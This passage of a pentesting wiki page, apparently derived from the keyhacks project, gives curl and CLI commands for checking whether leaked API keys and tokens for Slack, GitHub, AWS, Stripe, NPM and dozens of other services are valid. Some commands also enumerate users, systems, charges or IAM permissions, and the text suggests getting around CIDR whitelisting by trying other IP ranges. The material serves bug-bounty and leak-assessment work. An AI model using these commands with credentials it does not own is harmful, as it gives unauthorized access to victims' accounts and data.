Keyarrow-up-right](https://ipstack.com/documentation) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#npm-token) [NPM tokenarrow-up-right](https://docs.npmjs.com/about-authentication-tokens) You can verify NPM token [using `npm`arrow-up-right](https://medium.com/bugbountywriteup/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3) (replacing `00000000-0000-0000-0000-000000000000` with NPM token): Another way to verify token is to query API directly: You'll get username in response in case of success, `401 Unauthorized` in case if token doesn't exists and `403 Forbidden` in case if your IP address is not whitelisted. NPM token can be [CIDR-whitelistedarrow-up-right](https://docs.npmjs.com/creating-and-viewing-authentication-tokens#creating-tokens-with-the-cli) . Thus if you are using token from _non-whitelisted_ CIDR you'll get `403 Forbidden` in response. So try to verify NPM token from different IP ranges!. P.S. Some companies [uses registries other than `registry.npmjs.org`arrow-up-right](https://medium.com/bugbountywriteup/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3) . If it's the case replace all `registry.npmjs.org` occurrences with domain name of company's NPM registry. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#opsgenie-api-key) [OpsGenie API Keyarrow-up-right](https://docs.opsgenie.com/docs/api-overview) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#keen.io-api-key) [Keen.io API Keyarrow-up-right](https://keen.io/docs/api/) Get all collections for a specific project: > Note: Keep the colon at the end of the token to prevent cURL from requesting a password. Info: The token is always in the following format: sk\_live\_34charshere, where the 34charshere part contains 34 characters from a-z A-Z 0-9 There is also a test key, which starts with sk\_test, but this key is worthless since it is only used for testing purposes and most likely doesn't contain any sensitive info. The live key, on the other hand, can be used to extract/retrieve a lot of info. Going from charges, to the complete product list. Keep in mind that you will never be able to get the full credit card information since stripe only gives you like the last 4 digits. More info / complete docs: [https://stripe.com/docs/api/authenticationarrow-up-right](https://stripe.com/docs/api/authentication) > ======= ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#calendly-api-key) [Calendly API Keyarrow-up-right](https://developer.calendly.com/docs/) Get user information: List Webhook Subscriptions: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#azure-application-insights-app-id-and-api-key) [Azure Application Insights APP ID and API Keyarrow-up-right](https://dev.applicationinsights.io/reference) Get the total number of requests made in last 24 hours: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#cypress-record-key) [Cypress record keyarrow-up-right](https://docs.cypress.io/guides/dashboard/projects.html#Record-key) In order to check `recordKey` validity you'll need `projectId` which is public value that usually can be found at `cypress.json` file. Replace `{recordKey}` and `{projectId}` in JSON body with your values. Yes, this request needs to be that big. It'll return `200 OK` with some information about run in case if both `projectId` and `recordKey` are valid, `404 Not Found` with `{"message":"Project not found. Invalid projectId."}` if `projectId` is invalid or `401 Unauthorized` with `{"message":"Invalid Record Key."}` if `recordKey` is invalid. Example of `projectId` is `1yxykz` and example of `recordKey` is `a216e7b4-4819-4713-b9c2-c5da60a1c48c`. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#youtube-api-key) [YouTube API Keyarrow-up-right](https://developers.google.com/youtube/v3/docs/) Fetch content details for a YouTube channel (The channelId in this case points to PewDiePie's channel). ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#abtasty-api-key) [ABTasty API Keyarrow-up-right](https://developers.abtasty.com/server-side.html#authentication) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#iterable-api-key) [Iterable API Keyarrow-up-right](https://api.iterable.com/api/docs) Export campaign analytics data in JSON format, one entry per line. Use of either 'range' or 'startDateTime' and 'endDateTime' is required. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#amplitude-api-keys) [Amplitude API Keysarrow-up-right](https://help.amplitude.com/hc/en-us/articles/205406637-Export-API-Export-Your-Project-s-Event-Data) The response is a zipped archive of JSON files, with potentially multiple files per hour. Note that events prior to 2014-11-12 will be grouped by day instead of by the hour. If you request data for a time range during which no data has been collected for the project, then you will receive a 404 response from the server. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#visual-studio-app-center-api-token) [Visual Studio App Center API Tokenarrow-up-right](https://docs.microsoft.com/en-us/appcenter/api-docs/) 1. List all the app projects for the API Token: 1. Fetch the latest app build information for a particular project: > Use the `name` and `owner.name` obtained in response in Step [1arrow-up-right](https://github.com/streaak/keyhacks?tab=readme-ov-file#438) > . ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#weglot-api-key) [WeGlot Api Keyarrow-up-right](https://weglot.com/) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pivotaltracker-api-token) [PivotalTracker API Tokenarrow-up-right](https://www.pivotaltracker.com/help/api/#top) 1. List User Information with API Token: 1. Obtain API Token with Valid User Credentials: ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#linkedin-oauth) [LinkedIn OAUTHarrow-up-right](https://docs.microsoft.com/en-us/linkedin/shared/authentication/client-credentials-flow?context=linkedin/context) A successful access token request returns a JSON object containing access\_token, expires\_in. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#help-scout-oauth) [Help Scout OAUTHarrow-up-right](https://developer.helpscout.com/mailbox-api/overview/authentication/) A successful access token request returns a JSON object containing token\_type, access\_token, expires\_in. ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#shodan-api-key) [Shodan Api Keyarrow-up-right](https://developer.shodan.io/api/requirements) ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bazaarvoice-passkey) [Bazaarvoice Passkeyarrow-up-right](https://developer.bazaarvoice.com/conversations-api/home) A Successful Passkey Request returns a JSON object containing company name ### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#grafana-access-token) [Grafana Access Tokenarrow-up-right](https://grafana.com/docs/grafana/latest/developers/http_api/user/) Grafana API supports Bearer and Basic authorisation schemes. Bearer: Basic: [PreviousHTTP Request Smugglingchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling) [NextPivoting, Tunneling, and Port Forwardingchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/pivoting-tunneling-and-port-forwarding) Last updated 2 years ago * [Table of Contents](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#table-of-contents) * [Detailed Information](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#detailed-information) * [Slack Webhook](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#slack-webhook) * [Slack API token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#slack-api-token) * [SauceLabs Username and access Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#saucelabs-username-and-access-key) * [Facebook AppSecret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#facebook-appsecret) * [Facebook Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#facebook-access-token) * [Firebase](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#firebase) * [Github Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-token) * [Github client id and client secret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-client-id-and-client-secret) * [Firebase Cloud Messaging](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#firebase-cloud-messaging) * [GitHub private SSH key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#github-private-ssh-key) * [Twilio Account\_sid and Auth token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twilio-account_sid-and-auth-token) * [Twitter API Secret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twitter-api-secret) * [Twitter Bearer token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#twitter-bearer-token) * [HubSpot API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#hubspot-api-key) * [Infura API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#infura-api-key) * [Deviant Art Secret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#deviant-art-secret) * [Deviant Art Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#deviant-art-access-token) * [Pendo Integration Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pendo-integration-key) * [SendGrid API Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#sendgrid-api-token) * [Square](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#square) * [Contentful Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#contentful-access-token) * [Dropbox API](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#dropbox-api) * [AWS Access Key ID and Secret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#aws-access-key-id-and-secret) * [Lokalise API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#lokalise-api-key) * [MailGun Private Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mailgun-private-key) * [FreshDesk API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#freshdesk-api-key) * [JumpCloud API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#jumpcloud-api-key) * [Microsoft Azure Tenant](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#microsoft-azure-tenant) * [Microsoft Shared Access Signatures (SAS)](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#microsoft-shared-access-signatures-sas) * [New Relic Personal API Key (NerdGraph)](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#new-relic-personal-api-key-nerdgraph) * [New Relic REST API](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#new-relic-rest-api) * [Heroku API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#heroku-api-key) * [Mapbox API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mapbox-api-key) * [Salesforce API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#salesforce-api-key) * [Algolia API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#algolia-api-key) * [Zapier Webhook Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zapier-webhook-token) * [Pagerduty API token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pagerduty-api-token) * [BrowserStack Access Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#browserstack-access-key) * [Google Maps API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-maps-api-key) * [Google Recaptcha key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-recaptcha-key) * [Google Cloud Service Account credentials](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#google-cloud-service-account-credentials) * [Branch.IO Key and Secret](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#branch.io-key-and-secret) * [Bing Maps API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bing-maps-api-key) * [Bit.ly Access token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bit.ly-access-token) * [Buildkite Access token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#buildkite-access-token) * [ButterCMS-API-Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#buttercms-api-key) * [Asana Access token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#asana-access-token) * [Zendesk Access token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zendesk-access-token) * [Zendesk Api Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#zendesk-api-key) * [MailChimp API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#mailchimp-api-key) * [WPEngine API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#wpengine-api-key) * [DataDog API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#datadog-api-key) * [Delighted API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#delighted-api-key) * [Travis CI API token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#travis-ci-api-token) * [Telegram Bot API Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#telegram-bot-api-token) * [WakaTime API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#wakatime-api-key) * [Sonarcloud Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#sonarcloud-token) * [Spotify Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#spotify-access-token) * [Instagram Basic Display API Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#instagram-basic-display-api-access-token) * [Instagram Graph API Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#instagram-graph-api-access-token) * [Gitlab personal access token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#gitlab-personal-access-token) * [GitLab runner registration token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#gitlab-runner-registration-token) * [Paypal client id and secret key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#paypal-client-id-and-secret-key) * [Stripe Live Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#stripe-live-token) * [Razorpay API key and Secret key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#razorpay-api-key-and-secret-key) * [CircleCI Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#circleci-access-token) * [Cloudflare API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#cloudflare-api-key) * [Loqate API key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#loqate-api-key) * [Ipstack API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#ipstack-api-key) * [NPM token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#npm-token) * [OpsGenie API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#opsgenie-api-key) * [Keen.io API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#keen.io-api-key) * [Calendly API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#calendly-api-key) * [Azure Application Insights APP ID and API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#azure-application-insights-app-id-and-api-key) * [Cypress record key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#cypress-record-key) * [YouTube API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#youtube-api-key) * [ABTasty API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#abtasty-api-key) * [Iterable API Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#iterable-api-key) * [Amplitude API Keys](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#amplitude-api-keys) * [Visual Studio App Center API Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#visual-studio-app-center-api-token) * [WeGlot Api Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#weglot-api-key) * [PivotalTracker API Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#pivotaltracker-api-token) * [LinkedIn OAUTH](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#linkedin-oauth) * [Help Scout OAUTH](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#help-scout-oauth) * [Shodan Api Key](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#shodan-api-key) * [Bazaarvoice Passkey](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#bazaarvoice-passkey) * [Grafana Access Token](https://morgan-bin-bash.gitbook.io/pentesting/api-keys#grafana-access-token) Copy curl -s -X POST -H "Content-type: application/json" -d '{"text":""}' "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX" Copy curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1" Copy curl -u USERNAME:ACCESS_KEY https://saucelabs.com/rest/v1/users/USERNAME Copy https://graph.facebook.com/oauth/access_token?client_id=ID_HERE&client_secret=SECRET_HERE&redirect_uri=&grant_type=client_credentials Copy https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2 Copy curl -s -u "user:apikey" https://api.github.com/user curl -s -H "Authorization: token TOKEN_HERE" "https://api.github.com/users/USERNAME_HERE/orgs" # Check scope of your api token curl "https://api.github.com/rate_limit" -i -u "user:apikey" | grep "X-OAuth-Scopes:" Copy curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy' Copy curl -s -X POST --header "Authorization: key=AI..." --header "Content-Type:application/json" 'https://fcm.googleapis.com/fcm/send' -d '{"registration_ids":["1"]}' Copy $ ssh -i -T git@github.com Hi ! You've successfully authenticated, but GitHub does not provide shell access. Copy curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN Copy curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' Copy curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN' Copy https://api.hubapi.com/owners/v2/owners?hapikey={keyhere} Copy https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={keyhere} Copy curl https://mainnet.infura.io/v3/ -X POST -H "Content-Type: application/json" -d '{"jsonrpc":"2.0","method":"eth_accounts","params":[],"id":1}' Copy curl https://www.deviantart.com/oauth2/token -d grant_type=client_credentials -d client_id=ID_HERE -d client_secret=mysecret Copy curl https://www.deviantart.com/api/v1/oauth2/placebo -d access_token=Alph4num3r1ct0k3nv4lu3 Copy curl -X GET https://app.pendo.io/api/v1/feature -H 'content-type: application/json' -H 'x-pendo-integration-key:KEY_HERE' curl -X GET https://app.pendo.io/api/v1/metadata/schema/account -H 'content-type: application/json' -H 'x-pendo-integration-key:KEY_HERE' Copy curl -X "GET" "https://api.sendgrid.com/v3/scopes" -H "Authorization: Bearer SENDGRID_TOKEN-HERE" -H "Content-Type: application/json" Copy curl "https://squareup.com/oauth2/revoke" -d '{"access_token":"[RANDOM_STRING]","client_id":"[APP_ID]"}' -H "Content-Type: application/json" -H "Authorization: Client [CLIENT_SECRET]" Copy empty Copy { "message": "Not Authorized", "type": "service.not_authorized" } Copy curl https://connect.squareup.com/v2/locations -H "Authorization: Bearer [AUHT_TOKEN]" Copy {"locations":[{"id":"CBASELqoYPXr7RtT-9BRMlxGpfcgAQ","name":"Coffee \u0026 Toffee SF","address":{"address_line_1":"1455 Market Street","locality":"San Francisco","administrative_district_level_1":"CA","postal_code":"94103","country":"US"},"timezone":"America/Los_Angeles"........\ \ Copy\ \ {"errors":[{"category":"AUTHENTICATION_ERROR","code":"UNAUTHORIZED","detail":"This request could not be authorized."}]}\ \ Copy\ \ curl -v https://cdn.contentful.com/spaces/SPACE_ID_HERE/entries\?access_token\=ACCESS_TOKEN_HERE\ \ Copy\ \ curl -X POST https://api.dropboxapi.com/2/users/get_current_account --header "Authorization: Bearer TOKEN_HERE"\ \ Copy\ \ AWS_ACCESS_KEY_ID=xxxx AWS_SECRET_ACCESS_KEY=yyyy aws sts get-caller-identity\ \ Copy\ \ git clone https://github.com/andresriancho/enumerate-iam\ cd enumerate-iam\ ./enumerate-iam.py --access-key AKIA... --secret-key StF0q...\ \ Copy\ \ --url https://api.lokalise.com/api2/projects/ \\ --header 'x-api-token: [API-KEY-HERE]'\ \ Copy\ \ curl --user 'api:YOUR_API_KEY' "https://api.mailgun.net/v3/domains"\ \ Copy\ \ curl -v -u user@yourcompany.com:test -X GET 'https://domain.freshdesk.com/api/v2/groups/1'\ This requires the API key in 'user@yourcompany.com', pass in 'test' and 'domain.freshdesk.com' to be the instance url of the target. In case you get a 403, try the endpoint api/v2/tickets, which is accessible for all keys.\ \ \ Copy\ \ List systems:\ curl -H "x-api-key: APIKEYHERE" "https://console.jumpcloud.com/api/systems"\ curl -H "x-api-key: APIKEYHERE" "https://console.jumpcloud.com/api/systemusers"\ curl -H "x-api-key: APIKEYHERE" "https://console.jumpcloud.com/api/applications"\ \ Copy\ \ List systems:\ curl -X GET https://console.jumpcloud.com/api/v2/systems/{System_ID}/memberof \\ -H 'Accept: application/json' \\ -H 'Content-Type: application/json' \\ -H 'x-api-key: {API_KEY}'\ \ Copy\ \ CLIENT_ID: [0-9a-z\-]{36}\ CLIENT_SECRET: [0-9A-Za-z\+\=]{40,50}\ TENANT_ID: [0-9a-z\-]{36}\ \ Copy\ \ curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'client_id=&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default&client_secret=&grant_type=client_credentials' 'https://login.microsoftonline.com//oauth2/v2.0/token'\ \ Copy\ \ static void UseAccountSAS(string sasToken)\ {\ // Create new storage credentials using the SAS token.\ StorageCredentials accountSAS = new StorageCredentials(sasToken);\ // Use these credentials and the account name to create a Blob service client.\ CloudStorageAccount accountWithSAS = new CloudStorageAccount(accountSAS, "account-name", endpointSuffix: null, useHttps: true);\ CloudBlobClient blobClientWithSAS = accountWithSAS.CreateCloudBlobClient();\ \ // Now set the service properties for the Blob client created with the SAS.\ blobClientWithSAS.SetServiceProperties(new ServiceProperties()\ {\ HourMetrics = new MetricsProperties()\ {\ MetricsLevel = MetricsLevel.ServiceAndApi,\ RetentionDays = 7,\ Version = "1.0"\ },\ MinuteMetrics = new MetricsProperties()\ {\ MetricsLevel = MetricsLevel.ServiceAndApi,\ RetentionDays = 7,\ Version = "1.0"\ },\ Logging = new LoggingProperties()\ {\ LoggingOperations = LoggingOperations.All,\ RetentionDays = 14,\ Version = "1.0"\ }\ });\ \ // The permissions granted by the account SAS also permit you to retrieve service properties.\ ServiceProperties serviceProperties = blobClientWithSAS.GetServiceProperties();\ Console.WriteLine(serviceProperties.HourMetrics.MetricsLevel);\ Console.WriteLine(serviceProperties.HourMetrics.RetentionDays);\ Console.WriteLine(serviceProperties.HourMetrics.Version);\ }\ \ Copy\ \ curl -X POST https://api.newrelic.com/graphql \\ -H 'Content-Type: application/json' \\ -H 'API-Key: YOUR_API_KEY' \\ -d '{ "query": "{ requestContext { userId apiKey } }" } '\ \ Copy\ \ curl -X GET 'https://api.newrelic.com/v2/applications.json' \\ -H "X-Api-Key:${APIKEY}" -i\ \ Copy\ \ curl -X POST https://api.heroku.com/apps -H "Accept: application/vnd.heroku+json; version=3" -H "Authorization: Bearer API_KEY_HERE"\ \ Copy\ \ curl "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token=ACCESS_TOKEN"\ \ #Check token validity\ curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"\ \ #Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)\ curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"\ \ Copy\ \ curl https://instance_name.salesforce.com/services/data/v20.0/ -H 'Authorization: Bearer access_token_here'\ \ Copy\ \ curl --request PUT \\ --url https://-1.algolianet.com/1/indexes//settings \\ --header 'content-type: application/json' \\ --header 'x-algolia-api-key: ' \\ --header 'x-algolia-application-id: ' \\ --data '{"highlightPreTag": ""}'\ \ Copy\ \ curl -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d '{"name":"streaak"}' "webhook_url_here"\ \ Copy\ \ curl -H "Accept: application/vnd.pagerduty+json;version=2" -H "Authorization: Token token=TOKEN_HERE" -X GET "https://api.pagerduty.com/schedules"\ \ Copy\ \ curl -u "USERNAME:ACCESS_KEY" https://api.browserstack.com/automate/plan.json\ \ Copy\ \ https://www.google.com/recaptcha/api/siteverify\ \ Copy\ \ $ cat service_account.json\ {\ "type": "service_account",\ "project_id": "...",\ "private_key_id": "...",\ "private_key": "-----BEGIN PRIVATE KEY-----...-----END PRIVATE KEY-----\n",\ "client_email": "...",\ "client_id": "...",\ "auth_uri": "https://accounts.google.com/o/oauth2/auth",\ "token_uri": "https://oauth2.googleapis.com/token",\ "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",\ "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/..."\ }\ \ Copy\ \ $ gcloud auth activate-service-account --key-file=service_account.json\ Activated service account credentials for: [...]\ $ gcloud auth print-access-token\ ya29.c...\ \ Copy\ \ https://api2.branch.io/v1/app/KEY_HERE?branch_secret=SECRET_HERE\ \ Copy\ \ https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key=API_KEY\ \ Copy\ \ https://api-ssl.bitly.com/v3/shorten?access_token=ACCESS_TOKEN&longUrl=https://www.google.com\ \ Copy\ \ curl -H "Authorization: Bearer ACCESS_TOKEN" \\ https://api.buildkite.com/v2/access-token\ \ Copy\ \ curl -X GET 'https://api.buttercms.com/v2/posts/?auth_token=your_api_token'\ \ Copy\ \ curl -H "Authorization: Bearer ACCESS_TOKEN" https://app.asana.com/api/1.0/users/me\ \ Copy\ \ curl https://{subdomain}.zendesk.com/api/v2/tickets.json \\ -H "Authorization: Bearer ACCESS_TOKEN"\ \ Copy\ \ curl https://{target}.zendesk.com/api/v2/users.json \ -u support@{target}.com/token:{here your token}\ \ Copy\ \ curl --request GET --url 'https://.api.mailchimp.com/3.0/' --user 'anystring:' --include\ \ Copy\ \ curl "https://api.wpengine.com/1.2/?method=site&account_name=ACCOUNT_NAME&wpe_apikey=WPENGINE_APIKEY"\ \ Copy\ \ curl "https://api.datadoghq.com/api/v1/dashboard?api_key=&application_key="\ \ Copy\ \ curl https://api.delighted.com/v1/metrics.json \\ -H "Content-Type: application/json" \\ -u YOUR_DELIGHTED_API_KEY:\ \ Copy\ \ curl -H "Travis-API-Version: 3" -H "Authorization: token " https://api.travis-ci.org/repos\ \ Copy\ \ curl https://api.telegram.org/bot/getMe\ \ Copy\ \ curl "https://wakatime.com/api/v1/users/current?api_key=KEY_HERE"\ \ Copy\ \ curl -u : "https://sonarcloud.io/api/authentication/validate"\ \ Copy\ \ curl -H "Authorization: Bearer " https://api.spotify.com/v1/me\ \ Copy\ \ curl -X GET 'https://graph.instagram.com/{user-id}?fields=id,username&access_token={access-token}'\ \ Copy\ \ curl -i -X GET 'https://graph.facebook.com/v8.0/me/accounts?access_token={access-token}'\ \ Copy\ \ curl "https://gitlab.example.com/api/v4/projects?private_token="\ \ Copy\ \ docker run --rm gitlab/gitlab-runner register \\ --non-interactive \\ --executor "docker" \\ --docker-image alpine:latest \\ --url "https://gitlab.com/" \\ --registration-token "PROJECT_REGISTRATION_TOKEN" \\ --description "keyhacks-test" \\ --maintenance-note "Testing token with keyhacks" \\ --tag-list "docker,aws" \\ --run-untagged="true" \\ --locked="false" \\ --access-level="not_protected"\ \ Copy\ \ curl -v https://api.sandbox.paypal.com/v1/oauth2/token \\ -H "Accept: application/json" \\ -H "Accept-Language: en_US" \\ -u "client_id:secret" \\ -d "grant_type=client_credentials"\ \ Copy\ \ curl -v -X GET "https://api.sandbox.paypal.com/v1/identity/oauth2/userinfo?schema=paypalv1.1" -H "Content-Type: application/json" -H "Authorization: Bearer [ACCESS_TOKEN]"\ \ Copy\ \ curl https://api.stripe.com/v1/charges -u token_here:\ \ Copy\ \ curl -u : \\ https://api.razorpay.com/v1/payments\ \ Copy\ \ curl https://circleci.com/api/v1.1/me?circle-token=\ \ Copy\ \ curl -X GET "https://api.cloudflare.com/client/v4/user/tokens/verify" \\ -H "Authorization: Bearer "\ \ Copy\ \ curl 'http://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key=&Countries=US,CA&Language=en&Limit=5&Text=BHAR'\ \ Copy\ \ curl 'https://api.ipstack.com/{ip_address}?access_key={keyhere}'\ \ Copy\ \ export NPM_TOKEN="00000000-0000-0000-0000-000000000000"\ echo "//registry.npmjs.org/:_authToken=${NPM_TOKEN}" > .npmrc\ npm whoami\ \ Copy\ \ curl -H 'authorization: Bearer 00000000-0000-0000-0000-000000000000' 'https://registry.npmjs.org/-/whoami'\ \ Copy\ \ curl https://api.opsgenie.com/v2/alerts -H 'Authorization: GenieKey API_KEY'\ \ Copy\ \ curl "https://api.keen.io/3.0/projects/PROJECT_ID/events?api_key=READ_KEY"\ \ Copy\ \ curl --header "X-TOKEN: " https://calendly.com/api/v1/users/me\ \ Copy\ \ curl --header "X-TOKEN: " https://calendly.com/api/v1/hooks\ \ Copy\ \ curl -H "x-api-key: {API_Key}" "https://api.applicationinsights.io/v1/apps/{APP_ID}/metrics/requests/count"\ \ Copy\ \ curl -i -s -k -X $'POST' \\ -H $'x-route-version: 4' -H $'x-os-name: darwin' -H $'x-cypress-version: 5.5.0' -H $'host: api.cypress.io' -H $'accept: application/json' -H $'content-type: application/json' -H $'Content-Length: 1433' -H $'Connection: close' \\ --data-binary $'{\"ci\":{\"params\":null,\"provider\":null},\"specs\":[\"cypress/integration/examples/actions.spec.js\",\"cypress/integration/examples/aliasing.spec.js\",\"cypress/integration/examples/assertions.spec.js\",\"cypress/integration/examples/connectors.spec.js\",\"cypress/integration/examples/cookies.spec.js\",\"cypress/integration/examples/cypress_api.spec.js\",\"cypress/integration/examples/files.spec.js\",\"cypress/integration/examples/local_storage.spec.js\",\"cypress/integration/examples/location.spec.js\",\"cypress/integration/examples/misc.spec.js\",\"cypress/integration/examples/navigation.spec.js\",\"cypress/integration/examples/network_requests.spec.js\",\"cypress/integration/examples/querying.spec.js\",\"cypress/integration/examples/spies_stubs_clocks.spec.js\",\"cypress/integration/examples/traversal.spec.js\",\"cypress/integration/examples/utilities.spec.js\",\"cypress/integration/examples/viewport.spec.js\",\"cypress/integration/examples/waiting.spec.js\",\"cypress/integration/examples/window.spec.js\"],\"commit\":{\"sha\":null,\"branch\":null,\"authorName\":null,\"authorEmail\":null,\"message\":null,\"remoteOrigin\":null,\"defaultBranch\":null},\"group\":null,\"platform\":{\"osCpus\":[],\"osName\":\"darwin\",\"osMemory\":{\"free\":1153744896,\"total\":17179869184},\"osVersion\":\"19.6.0\",\"browserName\":\"Electron\",\"browserVersion\":\"85.0.4183.121\